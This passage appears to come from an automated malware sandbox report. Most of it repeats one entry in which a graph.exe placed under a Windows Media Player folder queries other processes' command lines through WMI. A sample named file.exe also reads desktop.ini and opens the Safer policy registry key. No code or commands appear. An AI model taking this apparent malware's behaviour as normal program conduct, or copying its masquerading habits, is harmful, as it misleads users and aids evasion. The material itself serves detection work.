                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
